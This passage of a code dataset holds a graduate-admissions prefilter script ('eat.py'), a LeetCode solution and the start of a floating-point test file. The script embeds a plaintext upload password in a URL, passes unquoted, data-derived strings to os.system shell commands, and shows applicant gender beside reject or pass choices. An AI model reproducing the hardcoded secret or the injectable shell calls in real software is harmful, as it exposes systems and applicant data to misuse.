= True\n else:\n map[fields[0]] = False\n return map\n\nfrom enum import IntEnum\nclass GradAppsField(IntEnum):\n \"enum records reverse engineering of internal gradapps data fields\"\n # danger this depends on knowledge of internal gradapps data layout\n UNI_1 = 29 # in UI: Academic History: University 1 Name and Location\n UNI_2 = 87\n UNI_3 = 97\n OVERALL_AVG_1 = 36 # Academic History: University 1 Overall Average\n OVERALL_AVG_2 = 92\n OVERALL_AVG_3 = 102\n GENDER = 338\n SGS_NUM = 342\n DCS_STATUS = 363\n DCS_UNION_INSTITUTION = 364\n PREFILTER_STATUS = 418\n #GPA_1 = 35 # Academic History: University 2 Final Year Average\n #GPA_2 = 92 \n\ndef dict_from_profile_data_file(fn):\n \"turn a profile.data file into a dictionary with only a few fields\"\n #TODO: using a dict is ugly. 
I'm sure there are fancy libs to do this pretty\n #TODO: maybe types.SimpleNamespace(**d)\n #TODO: maybe csv.DictReader ?\n if VERBOSE: print(fn)\n with open(fn,\"r\") as profile_data_file:\n import re\n rec = {}\n for line in profile_data_file:\n for gf in GradAppsField:\n if re.search(\"sp\" + str(int(gf)) + \"-value\", line):\n rhs = parse_rhs_profile_data_line(line)\n rec[gf] = rhs\n if VERBOSE: print(\"line: \", line.strip(),\"matches:\",gf,rhs)\n return rec\n\ndef concoct_profile_data_file_name_from_app_number(app_num):\n \"\"\"concoct full path of profile.data file from app_num.\n Depends on inside knowledge of how gradapps stores its stuff\"\"\"\n profile_data_fn = os.path.join(MSCAC_PROFILE_DATA_ROOT_DIR,app_num,\"profile.data\")\n if not os.path.exists(profile_data_fn):\n die(\"cannot find\", profile_data_fn)\n assert os.path.exists(profile_data_fn)\n return profile_data_fn\n\ndef build_dict_of_dicts(list_of_app_numbers):\n \"\"\"read the listed app_num's, concoct the path to the profile.data file and turn the data there into a dict\"\"\"\n profile_data_by_app_number = {}\n for app_num in list_of_app_numbers:\n d = dict_from_profile_data_file(concoct_profile_data_file_name_from_app_number(app_num))\n profile_data_by_app_number[app_num] = d\n return profile_data_by_app_number\n\ndef list_of_app_numbers(fn_of_app_numbers):\n \"\"\"read the listed app_num's, concoct the path to the profile.data file and turn the data there into a dict\"\"\"\n list_of_app_numbers = []\n try:\n with open(fn_of_app_numbers, \"r\") as in_file:\n for l in in_file:\n app_num = l.strip()\n list_of_app_numbers.append(app_num)\n except:\n print(fn_file_list, \"failed to open for read? really? bail!\")\n import traceback\n traceback.print_exc(file=sys.stdout)\n exit(3)\n return None\n return list_of_app_numbers\n\ndef parse_args():\n \"parse the command line parameters of this program\"\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument( \"uni_filter_regexp\", help=\"university to filter by\" )\n #TODO: change to --skip-sort with default true\n parser.add_argument( \"--sort\", action=\"store_false\",\n help=\"without option menu sorted by grade. --sort leaves menu in order app_nums listed\")\n parser.add_argument( \"--skip-prefiltered\", action=\"store_true\",\n help=\"without option already prefiltered applications appeard. --prefiltered leaves out already prefiltered applications\")\n parser.add_argument(\"--app_num_list\", action=\"append\", nargs=\"+\", type=str, help=\"list of app numbers to prefilter\")\n \n ns = parser.parse_args() # returns a namespace.\n #butcher app_num_list. 
(this hackery proves I don't understand the use of add_argument)\n if ns.app_num_list:\n assert len(ns.app_num_list) == 1\n s = ns.app_num_list[0][0]\n print(s)\n ns.app_num_list = s.split()\n if VERBOSE: print(ns)\n return ns\n\ndef pdf_file_no_for_app(app_number,nn):\n \"concoct full path to transcript, cv, sop files for an app_num in papers dir\"\n #gradapps keeps the documents submitted by applicant in papers directory\n return os.path.join(MSCAC_PAPERS_DIR, str(app_number), \"file\" + app_num + \"-\" + str(nn) + \".pdf\")\n\ndef shorten_uni_name(uni_name):\n \"take a few common substrings out of institution name\"\n return ( uni_name.replace(\"UNIVERSITY\",\"\")\n .replace(\"UNIV\",\"\")\n .replace(\"university\",\"\")\n .replace(\"University\",\"\") \n .replace(\"INSTITUTION\",\"\").replace(\"INST\",\"\").replace(\"Institution\",\"\").replace(\"institution\",\"\")\n .replace(\" of\",\"\").replace(\" OF\",\"\")\n .replace(\"Science\",\"Sci\").replace(\"science\",\"sci\")\n .replace(\"Technology\",\"Tech\").replace(\"technology\",\"tech\")\n .lstrip(\" \")\n .rstrip(\" \")\n .replace(\" \",\"_\") )\n\ndef extract_gpa(profile_data, u_field_name,gpa_field_name):\n \"WIP extract gpa from text field attempting to work around common applicant mistakes\"\n if not u_field_name in profile_data.keys():\n return None\n if not gpa_field_name in profile_data:\n return None\n gpa_str = profile_data[gpa_field_name]\n try:\n return float(gpa_str) #normal case where applicant entered a number..\n except:\n #some applicants take it into their heads to enter \"3.999/4\", or \"89% (first class honours)\"\n fields = re.compile(\"[%/]\").split(gpa_str)\n if len(fields) > 1:\n try:\n # last try.. if first field is a number return that.\n return float(fields[0])\n except:\n return None\n else:\n return None\n\ndef extract_gpa_from_multiple_fields(profile_data):\n gpa1 = extract_gpa(profile_data, GradAppsField.UNI_1,GradAppsField.OVERALL_AVG_1)\n if gpa1:\n return gpa1\n gpa2 = extract_gpa(profile_data, GradAppsField.UNI_2,GradAppsField.OVERALL_AVG_2)\n if gpa2:\n return gpa2\n gpa3 = extract_gpa(profile_data, GradAppsField.UNI_3,GradAppsField.OVERALL_AVG_3)\n if gpa3:\n return gpa3\n return None\n\ndef extract_uni(profile_data, u_field_name):\n \"WIP \"\n if not u_field_name in profile_data.keys():\n return None\n return profile_data[u_field_name]\n \ndef extract_uni_name_from_multiple_fields(profile_data):\n #TODO: make this into map\n uni1 = extract_uni(profile_data, GradAppsField.UNI_1)\n if uni1:\n return uni1\n uni2 = extract_uni(profile_data, GradAppsField.UNI_2)\n if uni2:\n return uni2\n uni3 = extract_uni(profile_data, GradAppsField.UNI_3)\n if uni3:\n return uni3\n return \"-\"\n \n#try and sort app_num_list by GPA\ndef extract_gpa_for_sorted(profile_data):\n gpa = extract_gpa_from_multiple_fields(profile_data)\n if gpa:\n return gpa\n else:\n #print(\"grade field parsing failed, using zero\")\n return 0.0\n\n \n# warning, this depends on secret knowledge of gradapps status codes\n# (the int values depend on the order of some radio button that Lloyd set up)\n# TODO: build this from enum\nprefilter_status_map = {\n 1: \"Reject\",\n 2: \"Pass-Star\",\n 3: \"Pass-VGE\",\n 4: \"NCS-Reject\",\n 5: \"NCS-Pass\",\n 6: \"Pass-Unsure\",\n 7: \"Pass-Good\",\n 8: \"NCS-Star\",\n }\ndef extract_prefilter_status(profile_data):\n \"map the prefilter status value extracted from gradapps to its string name\"\n try:\n return prefilter_status_map[int(profile_data[GradAppsField.PREFILTER_STATUS])]\n except:\n return 
\"-\"\n\ndef pretty_print_app_list(app_num_to_profile_data_dict,num_list,file_whatsit,session_prefilter_decision_map):\n \"print the list of applicants to filter, or just after filtering\"\n # TODO: figure out better way to do nasty session_prefilter_decision_map thing (needed to reuse this code to pretty print after menu)\n #TODO: rename file_whatsit\n print(\"\\n\\n===============================\\nAPPS matching: \",uni_filter_regexp)\n for app_num in num_list:\n profile_data = app_num_to_profile_data_dict[app_num]\n sgs_num = profile_data[GradAppsField.SGS_NUM]\n if session_prefilter_decision_map:\n # run after decisions have been made this session\n if sgs_num in session_prefilter_decision_map:\n prefilter_status = session_prefilter_decision_map[sgs_num]\n else:\n prefilter_status = \"Skip\" #skipped making decision, so nothing in map\n else:\n # being run before starting the session, no decisions yet\n prefilter_status = extract_prefilter_status(profile_data)\n\n print(\"%5s\" % app_num,\n profile_data[GradAppsField.GENDER],\n \"%11s\" % prefilter_status,\n \"%5.1f\" % extract_gpa_for_sorted(profile_data),\n \"%12s\" % sgs_num,\n profile_data[GradAppsField.DCS_UNION_INSTITUTION].rstrip('|'),\n file=file_whatsit\n )\n \n print(\"===============================\\n\")\n \ndef write_to_new_file(header_line, fn,dict):\n \"\"\"write all lines out to a new file name\"\"\"\n #TODO: use csv.writer ?\n #TODO: rename new_csv_file\n if VERBOSE: print(\"write_to_new_file:\",fn,dict)\n if os.path.exists(fn):\n os.system(\"mv %s %s\" % (fn, \"/tmp\"))\n if VERBOSE: print(\"existing %s moved to /tmp\" % fn)\n with open(fn,'w') as new_file:\n print(header_line,file=new_file)\n for k in dict.keys():\n line = k + \",\" + str(dict[k])\n if VERBOSE: print(\"write_to_new_file:\",line)\n print(line,file=new_file)\n\n\ndef read_query_from_input(prompt):\n \"UI read a line from stdin\"\n try:\n # readline will do completion on utorid's but can enter any string from grade file too\n query_string = input(prompt)\n if len(query_string) == 0:\n return None\n else:\n return query_string\n except KeyboardInterrupt:\n print(\"..keyboard interrupt..\")\n return '' #empty string\n except EOFError:\n print(\"..eof..\")\n return None\n\ndef prefilter_status_field(profile_data):\n \"the prefilter status field we will set for the application has school and gpa\"\n uni_name = extract_uni_name_from_multiple_fields(profile_data)\n gpa = extract_gpa_from_multiple_fields(profile_data)\n if gpa == None:\n gpa = 0.0\n status = \"%s-%.1f\" % (shorten_uni_name(uni_name),gpa)\n return status\n\ndef prefilter_prompt(app_num,profile_data,ix,n):\n \"prompt line with a bunch of very compressed info. 
gender, school, rank, gpa \"\n uni_name = extract_uni_name_from_multiple_fields(profile_data)\n try:\n ranking = int(uni_ranking[uni_name])\n except:\n ranking = 1001\n prompt = \"%d) %d/%d %s %s %03d\" % (app_num, ix, n, profile_data[GradAppsField.GENDER],\n prefilter_status_field(profile_data), ranking)\n return prompt\n\n \ndef prefilter_info_panel(app_num,profile_data,ix,n):\n \"compact, few line, application history\"\n def extract_uni_info_tuple( which_uni, which_mark):\n \"return tuple fetching info about app's schooling \"\n uni_name = extract_uni(profile_data, which_uni)\n gpa = None\n rank = None\n if uni_name:\n gpa = extract_gpa(profile_data, which_uni, which_mark)\n try:\n rank = int(uni_ranking[uni_name])\n except:\n return (uni_name, gpa, 1001) #ie sentinel (bogus) rank\n return (uni_name,gpa,rank)\n def append_to_panel(ix,tuple,fmt):\n \"refactor format code until it looks like this\"\n (uni1,gpa1,rank1) = tuple\n if uni1:\n return fmt % (ix, uni1,gpa1,rank1)\n else:\n return \"%-5d-\\n\" % ix\n \n HDR_FMT = \"%-5s%-40s %5s %5s\\n\"\n FMT = \"%-5d%-40s %5s %5s\\n\"\n \n panel = \"institution info from app %d:\\n\" % (int(app_num))\n panel += append_to_panel( \"=\"*4, (\"=\"*40, \"=\"*5, \"=\"*5), HDR_FMT)\n panel += append_to_panel( \"#\", (\"Institution\", \"GPA\", \"rank\"), HDR_FMT)\n panel += append_to_panel( \"-\"*4, (\"-\"*40, \"-\"*5, \"-\"*5), HDR_FMT)\n panel += append_to_panel(1, extract_uni_info_tuple(GradAppsField.UNI_1, GradAppsField.OVERALL_AVG_1),FMT)\n panel += append_to_panel(2, extract_uni_info_tuple(GradAppsField.UNI_2, GradAppsField.OVERALL_AVG_2),FMT)\n panel += append_to_panel(3, extract_uni_info_tuple(GradAppsField.UNI_3, GradAppsField.OVERALL_AVG_3),FMT)\n panel += append_to_panel( \"=\"*4, (\"=\"*40, \"=\"*5, \"=\"*5), HDR_FMT)\n return panel\n\ndef batch_hack(app_num_to_profile_data, completed_app_dict):\n \"this printed out a csv file which we used to clean up the dcs application status fields\"\n app_num_list = []\n for app_num in app_num_to_profile_data.keys():\n profile_data = app_num_to_profile_data[app_num]\n institution = profile_data[GradAppsField.DCS_UNION_INSTITUTION]\n if VERBOSE: print(\"institution\",uni_filter_regexp, institution)\n if not app_num in completed_app_dict.keys():\n if VERBOSE:print(\"skip\", app_num, \"because not complete\")\n continue\n elif len(profile_data[GradAppsField.PREFILTER_STATUS]) == 0:\n if VERBOSE: print(\"skip\", app_num, \"because prefilter_status not set\")\n continue\n app_num_list.append(app_num)\n #print(app_num_list)\n #print(prefilter_status_map[1])\n for app_num in app_num_list:\n profile_data = app_num_to_profile_data[app_num]\n prefilter_dec = int(profile_data[GradAppsField.PREFILTER_STATUS])\n if prefilter_dec == 1 or prefilter_dec == 4:\n continue #skip reject\n sgs_num = profile_data[GradAppsField.SGS_NUM]\n #print(sgs_num, prefilter_status_map[prefilter_dec],prefilter_status_field(profile_data))\n print(\"%s,%s\" % (sgs_num, prefilter_status_field(profile_data)))\n exit(0) #make sure batch goes no further\n\ndef sams_batch_hack(app_num_to_profile_data):\n \"this printed out a csv file which we used to set ALL dcs application status fields to the prefilter one\"\n app_num_list = []\n for app_num in app_num_to_profile_data.keys():\n profile_data = app_num_to_profile_data[app_num]\n ## if len(profile_data[GradAppsField.DCS_STATUS]) != 0:\n ## if VERBOSE: print(app_num, \"skip because DCS_STATUS already set to\", profile_data[GradAppsField.DCS_STATUS])\n ## continue\n 
app_num_list.append(app_num)\n\n if len(app_num_list)==0:\n die(\"sams_batch_hack: no apps remain after filtering.. nothing to do\")\n return\n print(\"CSV file created by sams_batch_hack: sets dcs_application_status\")\n for app_num in app_num_list:\n profile_data = app_num_to_profile_data[app_num]\n sgs_num = profile_data[GradAppsField.SGS_NUM]\n if VERBOSE: print(app_num,end='')\n print(\"%s,%s\" % (sgs_num, prefilter_status_field(profile_data)))\n sys.stdout.flush()\n\n \ndef find_app_numbers_in_filesystem(public_html_data_dir):\n \"\"\"find all the app numbers in the system by recursing the tree. each dir containing\n a file called profile.data identifies an application\"\"\"\n import os\n app_nums = []\n for root, dirs, files in os.walk(public_html_data_dir):\n for file in files:\n if file == \"profile.data\":\n if VERBOSE:\n print(root,dirs,os.path.join(root, file))\n print(os.path.basename(root))\n app_nums.append(str(os.path.basename(root)))\n return app_nums\n\nif __name__ == '__main__': \n import sys,os,re,functools\n #duplicate. sorta. so works on mac and windows laptops\n for dir in [TOOLS_DIR]:\n sys.path.append(dir)\n \n cmd_line_parm_ns = parse_args()\n cmdline_app_num_list = cmd_line_parm_ns.app_num_list\n uni_filter_regexp = cmd_line_parm_ns.uni_filter_regexp\n\n #read csv file ranking universities\n uni_ranking = uni_ranking_dict_from_csv_file(UNI_RANKING_CSV,has_header=False)\n \n completed_app_dict = completed_dict_from_applicationStatus_file(COMPLETE_FILE)\n\n import datetime\n now = datetime.datetime.now()\n fn_suffix = \"-%s-%s-%s_%s:%s\" % ( now.year, now.month, now.day, now.hour, now.minute)\n\n if cmd_line_parm_ns.app_num_list:\n #just the apps that were passed on command line\n app_num_list = cmd_line_parm_ns.app_num_list\n else:\n #go find them all\n app_num_list = find_app_numbers_in_filesystem(\"./public_html/data\")\n\n if VERBOSE: print(\"app_num_list\",app_num_list)\n \n #build a dict for each profile.data directory\n app_num_to_profile_data = build_dict_of_dicts(app_num_list)\n\n if VERBOSE: print(\"app_num_to_profile_data\",app_num_to_profile_data)\n\n ## print(\"prefilter_prompt\", prefilter_status_field(app_num_to_profile_data[\"858\"]))\n ## exit(0)\n # this is the spot to run scripts that see all the profile.data files and do stuff\n # like prepare a csv file to curl to the gradapps server\n #\n if False:\n try:\n sams_batch_hack(app_num_to_profile_data) #reset all dcs application status\n except:\n import traceback\n traceback.print_exc(file=sys.stderr)\n die(\"batch script throws\")\n exit(0)\n \n # now that have read all the data, filter per command line options into app_num_list\n app_num_list = []\n\n for app_num in app_num_to_profile_data.keys():\n profile_data = app_num_to_profile_data[app_num]\n institution = profile_data[GradAppsField.DCS_UNION_INSTITUTION]\n if VERBOSE: print(\"institution\",institution)\n #TODO: re.compile ?\n if not re.search(uni_filter_regexp, institution):\n if VERBOSE: print(\"skip\", app_num, \"because\", institution, \"not matched by\", uni_filter_regexp)\n else:\n sop_fn = pdf_file_no_for_app(app_num,1)\n cv_fn = pdf_file_no_for_app(app_num,2)\n transcript_fn = pdf_file_no_for_app(app_num,3)\n if not app_num in completed_app_dict.keys():\n if VERBOSE:print(\"skip\", app_num, \"because not complete\")\n continue\n elif cmd_line_parm_ns.skip_prefiltered and len(profile_data[GradAppsField.PREFILTER_STATUS]) > 0:\n if VERBOSE: print(\"skip\", app_num, \"because prefilter_status already set\")\n continue\n elif not 
os.path.exists(transcript_fn):\n print(\"skip\", app_num, \"because transcript does not exist\",transcript_fn)\n elif not os.path.exists(sop_fn):\n print(\"skip\", app_num, \"because SOP does not exist\")\n elif not os.path.exists(cv_fn):\n print(\"skip\", app_num, \"because CV does not exist\")\n else:\n app_num_list.append(app_num)\n \n if len(app_num_list) == 0:\n if cmd_line_parm_ns.skip_prefiltered:\n print(\"you have --skip-prefiltered active. perhaps no matching apps remain?\")\n die(\"no app matches university\", uni_filter_regexp)\n\n if cmd_line_parm_ns.sort:\n #TODO this re-sorts by GPA. bug? maybe should leave sort by app_num_list as above\n app_num_list = sorted(app_num_list,\n key=lambda app_num: extract_gpa_for_sorted(app_num_to_profile_data[app_num]),\n reverse=True\n )\n \n # check for repeat prefiltering. grep for app_nums in OFN_DIR\n grep_arg = \"\\|\".join(map(lambda app_num: app_num_to_profile_data[app_num][GradAppsField.SGS_NUM], app_num_list))\n if len(grep_arg) == 0:\n print(app_num_list)\n die(\"no sgs number for app_num\", app_num)\n cmd = \"%s '%s'\" % (GREP_SGS_NUM, grep_arg)\n\n if not os.system(cmd) == 0:\n sys.stdout.flush()\n print(\"found apps in log file that suggest they are repeats.. do you want to do grep loop to find the files?\")\n resp = input(\"y to do n**2 (SLOW!!) grep loop to find the apps > \")\n if resp.lower() == 'y':\n buf = \" \"\n badness = False\n bad = []\n #this is n**2 and actually takes a long time. if we need it rewrite to be linear in number of files.\n for app_num in app_num_list:\n cmd = \"%s %s %s\" % (GREP_ONE_SGS_NUM, str(app_num), str(app_num_to_profile_data[app_num][GradAppsField.SGS_NUM])) \n if not os.system(cmd) == 0:\n badness = True\n bad.append(app_num)\n msg = app_num_to_profile_data[app_num][GradAppsField.PREFILTER_STATUS]\n if len(msg) == 0:\n msg = \"prefilter status not set\"\n print( \"==>> in profile.data\", msg)\n if badness:\n print(\"some of these app_nums appear to have been pre-filtered earlier\")\n print(bad)\n sys.stdout.flush() \n resp = input(\"d to delete them from list and continue? q to exit > \")\n if resp.lower().startswith('q'):\n exit(0)\n if resp.lower().startswith('d'):\n for bad_app_num in bad:\n app_num_list.remove(bad_app_num)\n print(\"remaining applications:\", app_num_list)\n \n pretty_print_app_list(app_num_to_profile_data,app_num_list,sys.stdout,None)\n\n # print list before starting and prompt \n if False:\n try:\n print(\"prefilter above \" + str(len(app_num_list)) + \" applications?\")\n print(\"matching filter:\", uni_filter_regexp)\n response = input(\"enter to continue, q to exit > \")\n except:\n response = None\n import traceback\n traceback.print_exc(file=sys.stderr)\n die(\"oops\")\n \n if response == None or (len(response) > 0 and not response.lower().startswith(\"y\")):\n die(\"actually entering any char bails out.. only hitting enter alone continues.. :)\")\n\n from menu import PrefilterMenu\n\n # what to display in menu\n menu_line_dict = { 's' : \"Pass-Star: Star applicant pass prefilter. maybe early admission\",\n 'v' : \"Pass-VGE: Very Good applicant. pass prefilter\",\n 'g' : \"Pass-G: Good applicant. pass prefilter\",\n 'u' : \"Unsure: whether this applicant should pass prefilter\",\n 'r' : \"Reject: Reject application. fails prefilter\",\n 'x' : \"NCS-Reject: not enough CS. Fails prefilter\",\n 'y' : \"NCS-Pass: not enough CS but stellar enough to pass prefilter\",\n 'z' : \"NCS-Star: not enough CS.. 
yet stellar\",\n 'S' : \"SKIP setting Prefilter_Status\",\n 'Q' : \"Quit without saving (remove temp files)\"\n }\n #order to display menu items in \n response_code_list = ['r', 's','v','g','u','x','y','z','S','Q']\n\n #map responses to gradapps prefilter status column values\n gradapps_response_map = { 's' : \"Pass-Star\",\n 'v' : \"Pass-VGE\",\n 'g' : \"Pass-G\",\n 'u' : \"Unsure\",\n 'r' : \"Reject\",\n 'x' : \"NCS-Reject\",\n 'y' : \"NCS-Pass\",\n 'z' : \"NCS-Star\",\n }\n \n import uuid #universal unique resource naming thingy\n s = str(uuid.uuid4())\n OFN_basename = \"dcs-prefilter-\" + s + \".csv\"\n OFN = os.path.join(OFN_DIR,OFN_basename)\n BFN_basename = \"dcs-app-status-\"+ s + \".csv\"\n BFN = os.path.join(OFN_DIR,BFN_basename)\n if os.path.exists(BFN):\n die(\"Sorry, \" + BFN_basename + \" file already exists\")\n\n assert not os.path.exists(OFN)\n write_to_new_file(\"testwrite\",OFN,{}) #test write junk to OFN to make sure have perms and all that\n write_to_new_file(\"testwrite\",BFN,{}) #test write junk to OFN to make sure have perms and all that\n\n #########\n # main loop asking for decisions and writing them (paranoidly) away\n #########\n decisions = {}\n dcs_status_map = {}\n dcs_status_map_ix = 0\n #TODO: use Enumerate to eliminate dcs_status_map_ix \n for app_num in app_num_list:\n #concoct path of app_num \"papers\"\n # file-NNN-1.pdf is transcript\n sop_fn = pdf_file_no_for_app(app_num,1)\n cv_fn = pdf_file_no_for_app(app_num,2)\n transcript_fn = pdf_file_no_for_app(app_num,3)\n print(os.path.basename(sop_fn),os.path.basename(cv_fn),os.path.basename(transcript_fn))\n print('user_ref=$(cat /tmp/user_ref) && open \"https://confs.precisionconference.com/~mscac20/submissionProfile?paperNumber=' + app_num +'&userRef=$user_ref\"')\n \n def show_prefilter_menu(app_num):\n \"\"\"first attempt at refactoring to fix nasty control flow.\n returns true if should continue filtering, false if should bail to rsync\"\"\"\n #TODO: factor this guy out of the outer loop. how to cleanly handle all the closed over vars?\n resp = \"\"\n while True:\n os.system(VIEWER + \" \" + sop_fn + \" \" + cv_fn + \" \" + transcript_fn)\n profile_data = app_num_to_profile_data[app_num]\n\n ########## print a condensed \"info panel\" about the applicant.\n print(prefilter_info_panel( app_num, profile_data,dcs_status_map_ix, len(app_num_list)),end='')\n\n prompt = \"%s enter letter for prefilter_status decision > \" % (\n prefilter_prompt(int(app_num), profile_data, dcs_status_map_ix, len(app_num_list)) )\n\n menu = PrefilterMenu(response_code_list, menu_line_dict , prompt)\n\n #########\n # menu reading decision TODO: refactor into separate function\n #########\n resp = menu.menu()\n if resp == None:\n print(\"\\n\\nwonky reponse (interrupt key pressed?) from menu\",resp)\n continue\n\n\n if resp.startswith('S'):\n print(\"okay, skipping\", app_num)\n return True ######### goto next application (or once did)\n\n if resp.startswith('Q'):\n print(\"really quit, eh?. Nothing will be saved. dregs will be removed..\")\n ## print(\"decisions left on local machine in\",OFN)\n ## print(\"prefilter left on local machine in\",BFN)\n os.system( \"rm %s %s\" % (OFN, BFN) )\n return False\n\n #paste to clipboard\n os.system(\"/bin/echo -n '%s' | pbcopy\" % prefilter_info_panel( app_num, profile_data,dcs_status_map_ix, len(app_num_list)))\n\n gradapps_response = gradapps_response_map[resp]\n\n if gradapps_response == None:\n print(\"gotta choose something here. 
looping back to same application\")\n continue\n\n try:\n decisions[profile_data[GradAppsField.SGS_NUM]] = gradapps_response\n #TODO: fix this searching through string value for state\n if re.search(\"Reject\", gradapps_response):\n print(\"skip adding\", app_num, \"to dcs_status_map because rejected\")\n else:\n dcs_status_map[profile_data[GradAppsField.SGS_NUM]] = prefilter_status_field(profile_data)\n write_to_new_file(\"dcs app status\",BFN, dcs_status_map)\n\n ########## paranoidly, write every time\n # megaparanoid would be to copy file each time to tmp\n write_to_new_file(uni_filter_regexp,OFN, decisions)\n #put this in clipboard, since i want to email it to people so often\n\n #could fire up email here for stars ?\n print(\"open -a Firefox.app 'mailto:sam@cs.toronto.edu,arvind@cs.toronto.edu?subject=star %s?cc=clair@cs.toronto.edu'\" % 42)\n return True\n except Exception as e:\n #input(\"hello2\")\n print(e)\n import traceback\n traceback.print_exc(file=sys.stderr)\n print(OFN, \"something when wrong writing.. please try enter\", resp,\"again\")\n print(\"\"\"Note: if you get stuck looping in here only way out is to control-z and kill this job\"\"\")\n resp = \"\"\n continue\n \n dcs_status_map_ix += 1\n\n if not show_prefilter_menu(app_num):\n exit(0)\n \n\n if len(decisions) == 0:\n print(\"you skipped all applicants. no decisions made. exiting..\")\n exit(0)\n\n pretty_print_app_list(app_num_to_profile_data,app_num_list,sys.stdout,decisions)\n\n #########\n # rest of script largely for sending decisions back to gradapps\n #########\n print(\"\\n=========================\")\n os.system(\"ls -l \" + OFN)\n os.system(\"cat \" + OFN)\n print(\"=========================\\n\")\n print(\"\"\"next import these prefilter decisions into the gradapps system:\n 1. copy/rsync files to apps1 \n 2. 
run curl commands to gradapps server to update dcs application status and prefilter status columns\"\"\")\n \n dest = \"%s:%s/\" % (CSLAB_USERID, MSCAC_PREFILTER_DIR_NAME)\n rsync_cmd = \"rsync %s %s %s\" % (OFN, BFN, dest)\n\n #magic URL's configured into gradapps to upload data into fields\n URL_TEMPL='https://confs.precisionconference.com/~mscac20/uploadApps?config=%s&pass=StayorGo'\n CURL_TEMPL = 'curl -F appsFile=\"@mscac-prefilter/%s\" \"%s\"'\n curl_cmd = CURL_TEMPL % ( OFN_basename, URL_TEMPL % \"prefilter\" )\n curl_dcsstatus_cmd = CURL_TEMPL % ( BFN_basename, URL_TEMPL % \"dcsstatus\" )\n\n # probably will need ssh config support or will prompt for password\n\n print(OFN,BFN)\n resp = input(\"hit Enter rsync to %s > \" % CSLAB_USERID)\n if resp.startswith('s'):\n os.system(\"ls -l %s %s\" % (OFN,BFN))\n die(\"prefilter decisions not uploaded to gradapps\")\n\n os.system(rsync_cmd)\n print(\"ls -ltr | tail -2 to see if rsync'd files made it..\")\n os.system(\"ssh %s ls -ltr %s/ | tail -2\" % (CSLAB_USERID, MSCAC_PREFILTER_DIR_NAME))\n\n ssh_cmd = \"ssh -tt %s '%s'\" % (CSLAB_USERID, curl_cmd )\n ssh_dcsstatus_cmd = \"ssh -tt %s '%s'\" % (CSLAB_USERID, curl_dcsstatus_cmd)\n\n os.system(ssh_cmd)\n os.system(ssh_dcsstatus_cmd)\n\n with open(\"log\",\"a\") as a_file_whatsit:\n import datetime\n print(datetime.datetime.now(),file=a_file_whatsit)\n pretty_print_app_list(app_num_to_profile_data,app_num_list,a_file_whatsit,decisions)\n print(\"==================================\", file=a_file_whatsit)\n\n","sub_path":"eat.py","file_name":"eat.py","file_ext":"py","file_size_in_byte":34628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633397228","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Author: Lucas\n# Date: 2019-07-28 16:38:11\n\n\nclass Solution(object):\n def circularArrayLoop(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n visited = [False] * len(nums)\n for i in range(len(nums)):\n if visited[i]:\n continue\n current = set()\n index = i\n direction = nums[i] > 0\n while True:\n if index in current:\n loops = set()\n while index not in loops:\n loops.add(index)\n index = (index + nums[index]) % len(nums)\n tmp = [nums[j] > 0 for j in loops]\n if False in tmp and True in tmp:\n break\n return True\n elif visited[index]:\n break\n current.add(index)\n visited[index] = True\n tmp = (index + nums[index]) % len(nums)\n if tmp == index:\n break\n index = tmp\n return False\n\n\n# Test\nimport unittest\n\n\nclass TestSolution(unittest.TestCase):\n def test_case_1(self):\n nums = [2, -1, 1, 2, 2]\n self.assertTrue(\n Solution().circularArrayLoop(nums)\n )\n\n def test_case_2(self):\n nums = [-1, 2]\n self.assertFalse(\n Solution().circularArrayLoop(nums)\n )\n\n def test_case_3(self):\n nums = [1, -1]\n self.assertFalse(\n Solution().circularArrayLoop(nums)\n )\n\n def test_case_4(self):\n nums = [-1,2,1,2]\n self.assertTrue(\n Solution().circularArrayLoop(nums)\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"401-500/457_CircularArrayLoop/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"460219662","text":"# \n# Copyright 2011-2012 Jeff Bush\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# 
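The eat.py record above checks for repeated prefiltering by shelling out to grep once per application, and its own comment flags that loop as n**2. Loading the log's tokens into a set once makes the same check linear. The sketch below is my illustration of that idea, not code from the record; the log path, token format, and function names are assumptions.

def find_repeats(app_nums, sgs_of, log_path="prefilter.log"):
    """Return the app_nums whose SGS number already appears in the log."""
    seen = set()
    with open(log_path) as fh:
        for line in fh:                  # one linear scan of the log
            seen.update(line.split())    # collect every whitespace token
    # set membership is O(1) on average, so the whole check stays linear
    return [num for num in app_nums if sgs_of[num] in seen]

if __name__ == "__main__":
    import os, tempfile
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".log") as fh:
        fh.write("decided 1001 Pass-G\ndecided 1003 Reject\n")
        path = fh.name
    sgs = {"A": "1001", "B": "1002", "C": "1003"}
    print(find_repeats(["A", "B", "C"], sgs, path))  # ['A', 'C']
    os.remove(path)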
http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n\nfrom testgroup import *\nfrom types import *\nimport struct\n\nclass FloatingPointTests(TestGroup):\n\tdef test_floatingPointAddition():\n\t\ttestValues = [\n\t\t\t(17.79, 19.32, 37.11), # Exponents are equal\n\t\t\t(0.34, 44.23, 0x423247ad), # Exponent 2 larger (44.57, adjusted for truncated rounding)\n\t\t\t(44.23, 0.034, 0x42310e55), # Exponent 1 larger\n\t\t\t(-1.0, 5.0, 4.0), # First element is negative and has smaller exponent\n\t\t\t(-5.0, 1.0, -4.0), # First element is negative and has larger exponent\t\t\n\t\t\t(5.0, -1.0, 4.0), # Second element is negative and has smaller exponent\n\t\t\t(1.0, -5.0, -4.0), # Second element is negative and has larger exponent\n\t\t\t(5.0, 0.0, 5.0), # Zero identity (zero is a special case in IEEE754)\n\t\t\t(0.0, 5.0, 5.0),\n\t\t\t(0.0, 0.0, 0.0),\n\t\t\t(7.0, -7.0, 0.0), # Result is zero\n\t\t\t(1000000.0, 0.0000001, 